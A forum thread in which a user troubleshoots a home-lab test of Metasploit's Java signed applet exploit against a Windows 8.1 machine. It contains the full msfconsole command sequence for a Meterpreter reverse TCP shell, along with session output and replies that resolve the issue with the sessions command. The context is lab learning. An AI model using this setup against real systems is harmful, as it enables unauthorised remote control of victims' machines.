Options

Exploit HELP!!!!!!

DDStimeDDStime Member Posts: 113 ■■■□□□□□□□
in Off-Topic
I am testing the java signed exploit on windows systems adn I cant get part an issue I am having:

I can get into the box, but meterpreter does not open and the session closes?

I am using KALI linux and the box is Windows 8.1 pro (firewall/windows defender turned off/java security disabled)

Here is the setup:
msfconsole
search java signed
use exploit/multi/browser/java_signed_applet
set SRVHOST 192.168.43.136
set target 1
set LHOST 192.168.43.136
set payload windows/meterpreter/reverse_tcp
set URIPATH /
exploit
I then click on the run program on the target computer
[*] 192.168.43.116 java_signed_applet - Handling request
[*] Sending stage (769536 bytes) to 192.168.43.116
[*] Meterpreter session 1 opened (192.168.43.136:4444 -> 192.168.43.116:54424) at 2009-05-12 01:46:14 -0600
thats it? it times out and goes back to msf>

My IP is 192.168.43.136

As you can see the session is established but thats it, no meterpreter?

Any ideas?
· Share on FacebookShare on Twitter

Comments

  • Options
    impelseimpelse Member Posts: 1,237 ■■■■□□□□□□
    What happen when you use a simple shell not meterpreter? Sometimes I discovered that the meterpreter doesn't work all the time.
    Stop RDP Brute Force Attack with our RDP Firewall : http://www.thehost1.com
    It is your personal IPS to stop the attack.

    · Share on FacebookShare on Twitter
  • Options
    philz1982philz1982 Member Posts: 978
    Is this on a local network? If so packet trace both sides, check out the handshake since you are using TCP. If the handshake doesn't complete then you have issues, potentially firewall blocking reversing TCP.
    Read my blog @ www.buildingautomationmonthly.com
    Connect with me on LinkedIn @ https://www.linkedin.com/in/phillipzito
    · Share on FacebookShare on Twitter
  • Options
    impelseimpelse Member Posts: 1,237 ■■■■□□□□□□
    That's could be an option too. Last week in my lab I was trying to get a shell in php using metepreter, I got the connection and two seconds later the connection was lost.

    Also if I am not wrong I think there is one shell base in java, maybe you get stable shell.
    Stop RDP Brute Force Attack with our RDP Firewall : http://www.thehost1.com
    It is your personal IPS to stop the attack.

    · Share on FacebookShare on Twitter
  • Options
    MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Have you tried doing sessions -l to see if a session is established? If if you see you listed then just simply just use the command sessions -i and the ID number of the session listed.


    Edit:
    Some more info on the sessions command
    https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/#sessions-command
    · Share on FacebookShare on Twitter
  • Options
    DDStimeDDStime Member Posts: 113 ■■■□□□□□□□
    MrAgent wrote: »
    Have you tried doing sessions -l to see if a session is established? If if you see you listed then just simply just use the command sessions -i and the ID number of the session listed.


    Edit:
    Some more info on the sessions command
    https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/#sessions-command

    BINGO!

    Hahhaha I figured it out last night after about an hour of playing with firewalls, win defender and Java settings and finally reading about the specific exploit. I went through and couldn't believe that I overlooked it.

    I used : sessions -i 1 after establishing 12 different sessions hahah.

    Man, its amazing how you get so caught up in the technical side of things that you overlook the most simple solution first....
    · Share on FacebookShare on Twitter
  • Options
    MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    When I am trying to troubleshoot something that I can't figure out, I usually try and take a step back and look at the most basic things first.
    · Share on FacebookShare on Twitter
Sign In or Register to comment.